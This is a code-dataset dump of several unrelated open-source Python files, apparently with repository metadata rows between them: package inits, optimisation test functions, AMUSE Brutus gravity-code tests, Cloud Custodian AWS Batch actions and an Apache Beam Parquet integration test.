# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""Actions are used to wrap method and mark them as acting on the instrument.
"""
from .action import BaseAction, Action
from .register_action import RegisterAction
__all__ = ['BaseAction', 'Action', 'RegisterAction']
| 37.625
| 79
| 0.548173
|
479f6b0ee791e687b78741aef9d79878ed45c36d
| 462
|
py
|
Python
|
openapi_schema_validator/__init__.py
|
sebastianmika/openapi-schema-validator
|
b36c12b7356328901b9386e8b7f71d4bf2369a71
|
[
"BSD-3-Clause"
] | 32
|
2020-06-05T13:05:46.000Z
|
2022-03-08T23:10:08.000Z
|
openapi_schema_validator/__init__.py
|
sebastianmika/openapi-schema-validator
|
b36c12b7356328901b9386e8b7f71d4bf2369a71
|
[
"BSD-3-Clause"
] | 40
|
2020-03-05T11:18:07.000Z
|
2022-02-14T10:01:45.000Z
|
openapi_schema_validator/__init__.py
|
sebastianmika/openapi-schema-validator
|
b36c12b7356328901b9386e8b7f71d4bf2369a71
|
[
"BSD-3-Clause"
] | 19
|
2020-03-13T15:11:33.000Z
|
2022-02-28T09:48:00.000Z
|
# -*- coding: utf-8 -*-
from openapi_schema_validator._format import oas30_format_checker
from openapi_schema_validator.shortcuts import validate
from openapi_schema_validator.validators import OAS30Validator
__author__ = 'Artur Maciag'
__email__ = 'maciag.artur@gmail.com'
__version__ = '0.1.6'
__url__ = 'https://github.com/p1c2u/openapi-schema-validator'
__license__ = '3-clause BSD License'
__all__ = ['validate', 'OAS30Validator', 'oas30_format_checker']
| 35.538462
| 65
| 0.796537
|
08d7a45c3778d4a0ae5a402e5dfeb0904e43546b
| 1,893
|
py
|
Python
|
idaes/surrogate/alamopy_depr/examples.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 112
|
2019-02-11T23:16:36.000Z
|
2022-03-23T20:59:57.000Z
|
idaes/surrogate/alamopy_depr/examples.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 621
|
2019-03-01T14:44:12.000Z
|
2022-03-31T19:49:25.000Z
|
idaes/surrogate/alamopy_depr/examples.py
|
carldlaird/idaes-pse
|
cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f
|
[
"RSA-MD"
] | 154
|
2019-02-01T23:46:33.000Z
|
2022-03-23T15:07:10.000Z
|
#!/usr/bin/python
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
import numpy as np
import sys
def sixcamel(*x):
x1, x2 = x
t1 = np.multiply(4.0 - 2.1 * np.power(x1, 2) + np.divide(np.power(x1, 4), 3.0),
np.power(x1, 2))
t2 = np.multiply(4 * np.power(x2, 2) - 4,
np.power(x2, 2))
z = t1 + np.multiply(x1, x2) + t2
return z
def ackley(*x):
import numpy as np
x1, x2 = x
a = 20
b = 0.2
c = 2 * 3.14159
z = -a * np.exp(-b * np.sqrt(0.5 * (x1**2 + x2**2))) \
- np.exp(0.5 * (np.cos(c * x1) + np.cos(c * x2))) + a + np.exp(1)
return z
def branin(*x):
import numpy as np
x1, x2 = x
pi = 3.14159
z = (x2 - (5.1 / (4 * pi**2)) * x1**2 + (5 / pi) * x1 - 6)**2 \
+ 10 * (1 - (1 / (8 * pi)) * np.cos(x1) + 10) + np.random.normal(0, 0.1)
return z
if __name__ == '__main__':
sys.stdout.write(' ALAMOpy example functions ')
sys.stdout.write(' call functions with : ')
sys.stdout.write(' examples.<name>')
sys.stdout.write(' <name> = branin ')
sys.stdout.write(' sixcamel ')
sys.stdout.write(' ackley ')
| 34.418182
| 83
| 0.544638
|
25fed5d60879939ede0386670a20575bed1ac575
| 18,163
|
py
|
Python
|
src/amuse/test/suite/codes_tests/test_brutus.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 131
|
2015-06-04T09:06:57.000Z
|
2022-02-01T12:11:29.000Z
|
src/amuse/test/suite/codes_tests/test_brutus.py
|
rknop/amuse
|
85d5bdcc29cfc87dc69d91c264101fafd6658aec
|
[
"Apache-2.0"
] | 690
|
2015-10-17T12:18:08.000Z
|
2022-03-31T16:15:58.000Z
|
src/amuse/test/suite/codes_tests/test_brutus.py
|
rieder/amuse
|
3ac3b6b8f922643657279ddee5c8ab3fc0440d5e
|
[
"Apache-2.0"
] | 102
|
2015-01-22T10:00:29.000Z
|
2022-02-09T13:29:43.000Z
|
import os
import os.path
import math
from amuse.community import *
from amuse.test.amusetest import TestWithMPI
from amuse.units import units, nbody_system, constants
from amuse.datamodel import Particles
from amuse.community.brutus.interface import BrutusInterface, Brutus
import random
try:
import mpmath
HAS_MPMATH=True
except ImportError:
HAS_MPMATH=False
class TestBrutusInterface(TestWithMPI):
def test1(self):
print("Test BrutusInterface initialization")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test2(self):
print("Test BrutusInterface new_particle / get_state")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual(0, instance.commit_parameters())
id, error = instance.new_particle(mass = 11.0, radius = 2.0, x = 0.0, y = 0.0, z = 0.0, vx = 0.0, vy = 0.0, vz = 0.0)
self.assertEqual(0, error)
self.assertEqual(0, id)
id, error = instance.new_particle(mass = 21.0, radius = 5.0, x = 10.0, y = 0.0, z = 0.0, vx = 10.0, vy = 0.0, vz = 0.0)
self.assertEqual(0, error)
self.assertEqual(1, id)
self.assertEqual(0, instance.commit_particles())
retrieved_state1 = instance.get_state(0)
retrieved_state2 = instance.get_state(1)
self.assertEqual(0, retrieved_state1['__result'])
self.assertEqual(0, retrieved_state2['__result'])
self.assertEqual(11.0, retrieved_state1['mass'])
self.assertEqual(21.0, retrieved_state2['mass'])
self.assertEqual( 0.0, retrieved_state1['x'])
self.assertEqual(10.0, retrieved_state2['x'])
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test4(self):
print("Test BrutusInterface particle property getters/setters")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual([0, 0], list(instance.new_particle(0.01, 1, 0, 0, 0, 1, 0, 0.1).values()))
self.assertEqual([1, 0], list(instance.new_particle(0.02, -1, 0, 0, 0,-1, 0, 0.1).values()))
self.assertEqual(0, instance.commit_particles())
# getters
mass, result = instance.get_mass(0)
self.assertAlmostEqual(0.01, mass)
self.assertEqual(0,result)
radius, result = instance.get_radius(1)
self.assertAlmostEqual(0.1, radius)
self.assertEqual(0,result)
#self.assertEquals(-3, instance.get_mass(2)['__result']) # Particle not found
self.assertEqual([ 1, 0, 0, 0], list(instance.get_position(0).values()))
self.assertEqual([-1, 0, 0, 0], list(instance.get_position(1).values()))
self.assertEqual([ 0, 1, 0, 0], list(instance.get_velocity(0).values()))
self.assertEqual([ 0,-1, 0, 0], list(instance.get_velocity(1).values()))
# setters
self.assertEqual(0, instance.set_state(0, 0.01, 1,2,3, 4,5,6, 0.1))
self.assertEqual([0.01, 1.0,2.0,3.0, 4.0,5.0,6.0, 0.1, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_mass(0, 0.02))
self.assertEqual([0.02, 1.0,2.0,3.0, 4.0,5.0,6.0, 0.1, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_radius(0, 0.2))
self.assertEqual([0.02, 1.0,2.0,3.0, 4.0,5.0,6.0, 0.2, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_position(0, 10,20,30))
self.assertEqual([0.02, 10.0,20.0,30.0, 4.0,5.0,6.0, 0.2, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.set_velocity(0, 40,50,60))
self.assertEqual([0.02, 10.0,20.0,30.0, 40.0,50.0,60.0, 0.2, 0], list(instance.get_state(0).values()))
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test5(self):
print("Test BrutusInterface parameters")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
# word length
self.assertEqual([64, 0], list(instance.get_word_length().values()))
self.assertEqual(0, instance.set_word_length(80))
self.assertEqual([80, 0], list(instance.get_word_length().values()))
# bs tolerance, default (double) implementation
self.assertEqual([1.0e-6, 0], list(instance.get_bs_tolerance().values()))
self.assertEqual(0, instance.set_bs_tolerance(1.0e-8))
self.assertEqual([1.0e-8, 0], list(instance.get_bs_tolerance().values()))
# bs tolerance, string implementation for values requiring higher precision (note: actual accuracy depends on word_length)
#self.assertEquals(1e-8, eval(instance.get_bs_tolerance_string()[""]))
#self.assertEquals(0, instance.set_bs_tolerance_string("1e-10"))
#self.assertEquals(["1e-10", 0], instance.get_bs_tolerance_string().values())
# eta, float64
self.assertEqual([0.24, 0], list(instance.get_eta().values()))
self.assertEqual(0, instance.set_eta(0.10))
self.assertEqual([0.10, 0], list(instance.get_eta().values()))
# eta, string
#self.assertEquals(["0.10", 0], instance.get_eta_string().values())
self.assertEqual(0, instance.set_eta_string("123"))
self.assertEqual(["123", 0], list(instance.get_eta_string().values()))
# output dir
#self.assertEquals(["./", 0], instance.get_brutus_output_directory().values())
self.assertEqual(0, instance.set_brutus_output_directory("./out"))
self.assertEqual(["./out/", 0], list(instance.get_brutus_output_directory().values()))
self.assertEqual(0, instance.set_brutus_output_directory(instance.output_directory))
self.assertEqual([instance.output_directory+"/", 0], list(instance.get_brutus_output_directory().values()))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test6(self):
print("Test BrutusInterface evolve_model, equal-mass binary")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_bs_tolerance(1.0e-10))
self.assertEqual(0, instance.set_word_length(72))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual([0, 0], list(instance.new_particle(0.5, 0.5, 0, 0, 0, 0.5, 0).values()))
self.assertEqual([1, 0], list(instance.new_particle(0.5, -0.5, 0, 0, 0,-0.5, 0).values()))
self.assertEqual(0, instance.commit_particles())
self.assertEqual(0, instance.evolve_model(math.pi)) # half an orbit
for result, expected in zip(instance.get_position(0).values(), [-0.5, 0.0, 0.0, 0]):
self.assertAlmostEqual(result, expected, 5)
self.assertEqual(0, instance.evolve_model(2 * math.pi)) # full orbit
for result, expected in zip(instance.get_position(0).values(), [0.5, 0.0, 0.0, 0]):
self.assertAlmostEqual(result, expected, 5)
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test7(self):
print("Test BrutusInterface evolve_model, pythagorean problem")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
self.assertEqual(0, instance.initialize_code())
self.assertEqual(0, instance.set_bs_tolerance(1.0e-6))
self.assertEqual(0, instance.set_word_length(56))
self.assertEqual(0, instance.commit_parameters())
self.assertEqual([0, 0], list(instance.new_particle("3", "1", "3", "0", "0", "0", "0").values()))
self.assertEqual([1, 0], list(instance.new_particle("4", "-2", "-1", "0", "0", "0", "0").values()))
self.assertEqual([2, 0], list(instance.new_particle("5", "1", "-1", "0", "0", "0", "0").values()))
self.assertEqual(0, instance.commit_particles())
self.assertEqual(0, instance.evolve_model(10))
## add a check for assertequal final coordinates
for result, expected in zip(instance.get_position(0).values(), [0.778480410138085492274810667212415, 0.141392300290086165745727207379442, 0, 0]):
self.assertAlmostEqual(result, expected, 3)
self.assertEqual(0, instance.cleanup_code())
instance.stop()
def test8(self):
print("Test BrutusInterface string parameters")
instance = self.new_instance_of_an_optional_code(BrutusInterface)
instance.initialize_code()
instance.set_word_length(128)
for i in range(100):
x=random.random()
x=str(x)
instance.set_eta_string(x)
x_,err=instance.get_eta_string()
instance.set_eta_string(x_)
x__,err=instance.get_eta_string()
#~ assert x==x_
self.assertEqual(x_,x__)
instance.stop()
class TestBrutus(TestWithMPI):
def new_sun_earth_system(self):
particles = Particles(2)
particles.mass = [1.0, 3.0037e-6] | units.MSun
particles.radius = 1.0 | units.RSun
particles.position = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]] | units.AU
particles.velocity = [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]] | units.km / units.s
particles[1].vy = (constants.G * particles.total_mass() / (1.0 | units.AU)).sqrt()
return particles
def test1(self):
print("Testing Brutus initialization")
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus, convert_nbody)
instance.initialize_code()
instance.commit_parameters()
instance.cleanup_code()
instance.stop()
def test2(self):
print("Testing Brutus parameters")
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus,convert_nbody)
instance.initialize_code()
# print instance.parameters
self.assertEqual(instance.parameters.bs_tolerance, 1.0e-6)
instance.parameters.bs_tolerance = 1.0e-9
self.assertEqual(instance.parameters.bs_tolerance, 1.0e-9)
self.assertEqual(instance.parameters.word_length, 64)
instance.parameters.word_length = 128
self.assertEqual(instance.parameters.word_length, 128)
self.assertEqual(instance.parameters.dt_param, 0.24)
instance.parameters.dt_param = 0.10
self.assertEqual(instance.parameters.dt_param, 0.10)
self.assertEqual(instance.parameters.brutus_output_directory, instance.output_directory + os.sep)
instance.parameters.brutus_output_directory = "./out"
self.assertEqual(instance.parameters.brutus_output_directory, "./out/")
instance.parameters.brutus_output_directory = instance.output_directory
self.assertEqual(instance.parameters.brutus_output_directory, instance.output_directory + os.sep)
instance.cleanup_code()
instance.stop()
def test3(self):
print("Testing Brutus particles")
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus,convert_nbody)
instance.initialize_code()
instance.commit_parameters()
instance.particles.add_particles(self.new_sun_earth_system())
instance.commit_particles()
self.assertAlmostEqual(instance.particles.mass, [1.0, 3.0037e-6] | units.MSun)
self.assertAlmostEqual(instance.particles.radius, 1.0 | units.RSun)
self.assertAlmostEqual(instance.particles.position,
[[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]] | units.AU)
self.assertAlmostEqual(instance.particles.velocity,
[[0.0, 0.0, 0.0], [0.0, 29.7885, 0.0]] | units.km / units.s, 3)
instance.cleanup_code()
instance.stop()
def test4(self):
print("Testing Brutus evolve_model, 2 particles")
particles = Particles(2)
particles.mass = 0.5 | units.MSun
particles.radius = 1.0 | units.RSun
particles.position = [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]] | units.AU
particles.velocity = [[0.0, 0.0, 0.0], [0.0, 0.0, 0.0]] | units.km / units.s
particles[1].vy = (constants.G * (1.0 | units.MSun) / (1.0 | units.AU)).sqrt()
particles.move_to_center()
convert_nbody = nbody_system.nbody_to_si(1.0 | units.MSun, 1.0 | units.AU)
instance = self.new_instance_of_an_optional_code(Brutus, convert_nbody)
instance.initialize_code()
instance.parameters.bs_tolerance = 1e-6
instance.parameters.word_length = 56
instance.commit_parameters()
instance.particles.add_particles(particles)
instance.commit_particles()
primary = instance.particles[0]
P = 2 * math.pi * primary.x / primary.vy
position_at_start = primary.position.x
instance.evolve_model(P / 4.0)
self.assertAlmostRelativeEqual(position_at_start, primary.position.y, 6)
instance.evolve_model(P / 2.0)
self.assertAlmostRelativeEqual(position_at_start, -primary.position.x, 6)
instance.evolve_model(P)
self.assertAlmostRelativeEqual(position_at_start, primary.position.x, 6)
instance.cleanup_code()
instance.stop()
def sun_and_planets(self):
particles = Particles(9)
sun = particles[0]
mercury = particles[1]
venus = particles[2]
earth = particles[3]
mars = particles[4]
jupiter = particles[5]
saturn = particles[6]
uranus = particles[7]
neptune = particles[8]
sun.mass = 1047.517| units.MJupiter
sun.radius = 1.0 | units.RSun
sun.position = ( 0.005717 , -0.00538 , -2.130e-5 ) | units.AU
sun.velocity = ( 0.007893 , 0.01189 , 0.0002064 ) | units.kms
mercury.mass = 0.000174 | units.MJupiter
mercury.radius = 0 | units.RSun
mercury.position = ( -0.31419 , 0.14376 , 0.035135 ) | units.AU
mercury.velocity = ( -30.729 , -41.93 , -2.659 ) | units.kms
venus.mass = 0.002564 | units.MJupiter
venus.radius = 0 | units.RSun
venus.position = ( -0.3767 , 0.60159 , 0.0393 ) | units.AU
venus.velocity = ( -29.7725 , -18.849 , 0.795 ) | units.kms
earth.mass = 0.003185 | units.MJupiter
earth.radius = 0 | units.RSun
earth.position = ( -0.98561 , 0.0762 , -7.847e-5 ) | units.AU
earth.velocity = ( -2.927 , -29.803 , -0.000533 ) | units.kms
mars.mass = 0.000338 | units.MJupiter
mars.radius = 0 | units.RSun
mars.position = ( -1.2895 , -0.9199 , -0.048494 ) | units.AU
mars.velocity = ( 14.9 , -17.721 , 0.2979 ) | units.kms
jupiter.mass = 1 | units.MJupiter
jupiter.radius = 0 | units.RSun
jupiter.position = ( -4.9829 , 2.062 , -0.10990 ) | units.AU
jupiter.velocity = ( -5.158 , -11.454 , -0.13558 ) | units.kms
saturn.mass = 0.29947 | units.MJupiter
saturn.radius = 0 | units.RSun
saturn.position = ( -2.075 , 8.7812 , 0.3273 ) | units.AU
saturn.velocity = ( -9.9109 , -2.236 , -0.2398 ) | units.kms
uranus.mass = 0.045737 | units.MJupiter
uranus.radius = 0 | units.RSun
uranus.position = ( -12.0872 , -14.1917 , 0.184214 ) | units.AU
uranus.velocity = ( 5.1377 , -4.7387 , -0.06108 ) | units.kms
neptune.mass = 0.053962 | units.MJupiter
neptune.radius = 0 | units.RSun
neptune.position = ( 3.1652 , 29.54882 , 0.476391 ) | units.AU
neptune.velocity = ( -5.443317 , 0.61054 , -0.144172 ) | units.kms
particles.move_to_center()
return particles
def test5(self):
if not HAS_MPMATH:
self.skip("mpmath not available")
print("MPmath available -> Doing tests")
bodies = self.sun_and_planets()
convert_nbody = nbody_system.nbody_to_si(bodies.mass.sum(),bodies[1].position.length())
gravity = Brutus(convert_nbody,number_of_workers=1)
gravity.parameters.bs_tolerance = 1e-30
gravity.parameters.word_length = 180
gravity.parameters.dt_param = 0.0000000000010
gravity.particles.add_particles(bodies)
Etot_init = gravity.kinetic_energy + gravity.potential_energy
Ein = gravity.get_total_energy_p_si()
gravity.evolve_model(gravity.model_time + (30| units.day))
Eout = gravity.get_total_energy_p_si()
Ekin = gravity.kinetic_energy
Epot = gravity.potential_energy
Etot = Ekin + Epot
Loss_double = ((Etot_init-Etot)/gravity.get_time())
Loss_mp = (Ein - Eout)/gravity.get_time_p_si()
print("Loss with \"normal\" double =",Loss_double.number," (W)")
print("Loss with multiprecision =",Loss_mp," (W)")
gravity.stop()
self.assertTrue((Loss_mp <= 0.0000007) and (Loss_mp > 0.0000006))
| 43.978208
| 153
| 0.628475
|
4500bb8509d6fba4bc03cb2a60e0813c3a500647
| 6,440
|
py
|
Python
|
c7n/resources/batch.py
|
CliffJumper/cloud-custodian
|
47d2f0aa990d2179c8f6764ac53c12720069ddcb
|
[
"Apache-2.0"
] | null | null | null |
c7n/resources/batch.py
|
CliffJumper/cloud-custodian
|
47d2f0aa990d2179c8f6764ac53c12720069ddcb
|
[
"Apache-2.0"
] | null | null | null |
c7n/resources/batch.py
|
CliffJumper/cloud-custodian
|
47d2f0aa990d2179c8f6764ac53c12720069ddcb
|
[
"Apache-2.0"
] | 1
|
2019-11-06T16:54:06.000Z
|
2019-11-06T16:54:06.000Z
|
# Copyright 2017-2018 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from c7n.manager import resources
from c7n.query import QueryResourceManager
from c7n.actions import BaseAction
from c7n.utils import local_session, type_schema
@resources.register('batch-compute')
class ComputeEnvironment(QueryResourceManager):
class resource_type(object):
service = 'batch'
filter_name = 'computeEnvironments'
filter_type = 'list'
dimension = None
id = name = "computeEnvironmentName"
enum_spec = (
'describe_compute_environments', 'computeEnvironments', None)
@resources.register('batch-definition')
class JobDefinition(QueryResourceManager):
class resource_type(object):
service = 'batch'
filter_name = 'jobDefinitions'
filter_type = 'list'
dimension = None
id = name = "jobDefinitionName"
enum_spec = (
'describe_job_definitions', 'jobDefinitions', None)
class StateTransitionFilter(object):
"""Filter resources by state.
Try to simplify construction for policy authors by automatically
filtering elements (filters or actions) to the resource states
they are valid for.
"""
valid_origin_states = ()
def filter_resource_state(self, resources, key, states=None):
states = states or self.valid_origin_states
if not states:
return resources
orig_length = len(resources)
results = [r for r in resources if r[key] in states]
if orig_length != len(results):
self.log.warn(
"%s implicitly filtered %d of %d resources with valid %s" % (
self.__class__.__name__,
len(results), orig_length, key.lower()))
return results
@ComputeEnvironment.action_registry.register('update-environment')
class UpdateComputeEnvironment(BaseAction, StateTransitionFilter):
"""Updates an AWS batch compute environment
:example:
.. code-block: yaml
policies:
- name: update-environments
resource: batch-compute
filters:
- computeResources.desiredvCpus: 0
- state: ENABLED
actions:
- type: update-environment
state: DISABLED
"""
schema = {
'type': 'object',
'additionalProperties': False,
'properties': {
'type': {'enum': ['update-environment']},
'computeEnvironment': {'type': 'string'},
'state': {'type': 'string', 'enum': ['ENABLED', 'DISABLED']},
'computeResources': {
'type': 'object',
'additionalProperties': False,
'properties': {
'minvCpus': {'type': 'integer'},
'maxvCpus': {'type': 'integer'},
'desiredvCpus': {'type': 'integer'}
}
},
'serviceRole': {'type': 'string'}
}
}
permissions = ('batch:UpdateComputeEnvironment',)
valid_origin_status = ('VALID', 'INVALID')
def process(self, resources):
resources = self.filter_resource_state(
resources, 'status', self.valid_origin_status)
client = local_session(self.manager.session_factory).client('batch')
params = dict(self.data)
params.pop('type')
for r in resources:
params['computeEnvironment'] = r['computeEnvironmentName']
client.update_compute_environment(**params)
@ComputeEnvironment.action_registry.register('delete')
class DeleteComputeEnvironment(BaseAction, StateTransitionFilter):
"""Delete an AWS batch compute environment
:example:
.. code-block: yaml
policies:
- name: delete-environments
resource: batch-compute
filters:
- computeResources.desiredvCpus: 0
action:
- type: delete
"""
schema = type_schema('delete')
permissions = ('batch:DeleteComputeEnvironment',)
valid_origin_states = ('DISABLED',)
valid_origin_status = ('VALID', 'INVALID')
def delete_environment(self, r):
client = local_session(self.manager.session_factory).client('batch')
client.delete_compute_environment(
computeEnvironment=r['computeEnvironmentName'])
def process(self, resources):
resources = self.filter_resource_state(
self.filter_resource_state(
resources, 'state', self.valid_origin_states),
'status', self.valid_origin_status)
with self.executor_factory(max_workers=2) as w:
list(w.map(self.delete_environment, resources))
@JobDefinition.action_registry.register('deregister')
class DefinitionDeregister(BaseAction, StateTransitionFilter):
"""Deregisters a batch definition
:example:
.. code-block: yaml
policies:
- name: deregister-definition
resource: batch-definition
filters:
- containerProperties.image: amazonlinux
actions:
- type: deregister
"""
schema = type_schema('deregister')
permissions = ('batch:DeregisterJobDefinition',)
valid_origin_states = ('ACTIVE',)
def deregister_definition(self, r):
self.client.deregister_job_definition(
jobDefinition='%s:%s' % (r['jobDefinitionName'],
r['revision']))
def process(self, resources):
resources = self.filter_resource_state(
resources, 'status', self.valid_origin_states)
self.client = local_session(
self.manager.session_factory).client('batch')
with self.executor_factory(max_workers=2) as w:
list(w.map(self.deregister_definition, resources))
| 34.074074
| 82
| 0.632453
|
052b54f3ebfbb3a24b0cf606761d7d934536dc80
| 4,673
|
py
|
Python
|
sdks/python/apache_beam/io/parquetio_it_test.py
|
hengfengli/beam
|
83a8855e5997e0311e6274c03bcb38f94efbf8ef
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 5,279
|
2016-12-29T04:00:44.000Z
|
2022-03-31T22:56:45.000Z
|
sdks/python/apache_beam/io/parquetio_it_test.py
|
hengfengli/beam
|
83a8855e5997e0311e6274c03bcb38f94efbf8ef
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 14,149
|
2016-12-28T00:43:50.000Z
|
2022-03-31T23:50:22.000Z
|
sdks/python/apache_beam/io/parquetio_it_test.py
|
damondouglas/beam
|
4774ac713f427fefb38114f661516faef26d8207
|
[
"PSF-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 3,763
|
2016-12-29T04:06:10.000Z
|
2022-03-31T22:25:49.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
import logging
import string
import unittest
from collections import Counter
import pytest
from apache_beam import Create
from apache_beam import DoFn
from apache_beam import FlatMap
from apache_beam import Flatten
from apache_beam import Map
from apache_beam import ParDo
from apache_beam import Reshuffle
from apache_beam.io.filesystems import FileSystems
from apache_beam.io.parquetio import ReadAllFromParquet
from apache_beam.io.parquetio import WriteToParquet
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.util import BeamAssertException
from apache_beam.transforms import CombineGlobally
from apache_beam.transforms.combiners import Count
try:
import pyarrow as pa
except ImportError:
pa = None
@unittest.skipIf(pa is None, "PyArrow is not installed.")
class TestParquetIT(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@pytest.mark.it_postcommit
def test_parquetio_it(self):
file_prefix = "parquet_it_test"
init_size = 10
data_size = 20000
with TestPipeline(is_integration_test=True) as p:
pcol = self._generate_data(p, file_prefix, init_size, data_size)
self._verify_data(pcol, init_size, data_size)
@staticmethod
def _sum_verifier(init_size, data_size, x):
expected = sum(range(data_size)) * init_size
if x != expected:
raise BeamAssertException(
"incorrect sum: expected(%d) actual(%d)" % (expected, x))
return []
@staticmethod
def _count_verifier(init_size, data_size, x):
name, count = x[0].decode('utf-8'), x[1]
counter = Counter(
[string.ascii_uppercase[x % 26] for x in range(0, data_size * 4, 4)])
expected_count = counter[name[0]] * init_size
if count != expected_count:
raise BeamAssertException(
"incorrect count(%s): expected(%d) actual(%d)" %
(name, expected_count, count))
return []
def _verify_data(self, pcol, init_size, data_size):
read = pcol | 'read' >> ReadAllFromParquet()
v1 = (
read
| 'get_number' >> Map(lambda x: x['number'])
| 'sum_globally' >> CombineGlobally(sum)
| 'validate_number' >>
FlatMap(lambda x: TestParquetIT._sum_verifier(init_size, data_size, x)))
v2 = (
read
| 'make_pair' >> Map(lambda x: (x['name'], x['number']))
| 'count_per_key' >> Count.PerKey()
| 'validate_name' >> FlatMap(
lambda x: TestParquetIT._count_verifier(init_size, data_size, x)))
_ = ((v1, v2, pcol)
| 'flatten' >> Flatten()
| 'reshuffle' >> Reshuffle()
| 'cleanup' >> Map(lambda x: FileSystems.delete([x])))
def _generate_data(self, p, output_prefix, init_size, data_size):
init_data = [x for x in range(init_size)]
lines = (
p
| 'create' >> Create(init_data)
| 'produce' >> ParDo(ProducerFn(data_size)))
schema = pa.schema([('name', pa.binary()), ('number', pa.int64())])
files = lines | 'write' >> WriteToParquet(
output_prefix, schema, codec='snappy', file_name_suffix='.parquet')
return files
class ProducerFn(DoFn):
def __init__(self, number):
super().__init__()
self._number = number
self._string_index = 0
self._number_index = 0
def process(self, element):
self._string_index = 0
self._number_index = 0
for _ in range(self._number):
yield {'name': self.get_string(4), 'number': self.get_int()}
def get_string(self, length):
s = []
for _ in range(length):
s.append(string.ascii_uppercase[self._string_index])
self._string_index = (self._string_index + 1) % 26
return ''.join(s)
def get_int(self):
i = self._number_index
self._number_index = self._number_index + 1
return i
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
| 31.574324
| 80
| 0.691633
|
000714198c8e28c4bff3929e8b25b0b4271c074a
| 7,298
|
py
|
Python
|
qa/rpc-tests/walletbackup.py
|
koba24/tcoin
|
04b9caaca587fa1bc928c81940d7ba3d2754083b
|
[
"MIT"
] | 2
|
2018-06-24T19:51:25.000Z
|
2019-06-11T14:00:16.000Z
|
qa/rpc-tests/walletbackup.py
|
koba24/tcoin
|
04b9caaca587fa1bc928c81940d7ba3d2754083b
|
[
"MIT"
] | null | null | null |
qa/rpc-tests/walletbackup.py
|
koba24/tcoin
|
04b9caaca587fa1bc928c81940d7ba3d2754083b
|
[
"MIT"
] | 2
|
2018-09-13T22:54:32.000Z
|
2019-02-20T02:04:25.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Tcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
Exercise the wallet backup code. Ported from walletbackup.sh.
Test case is:
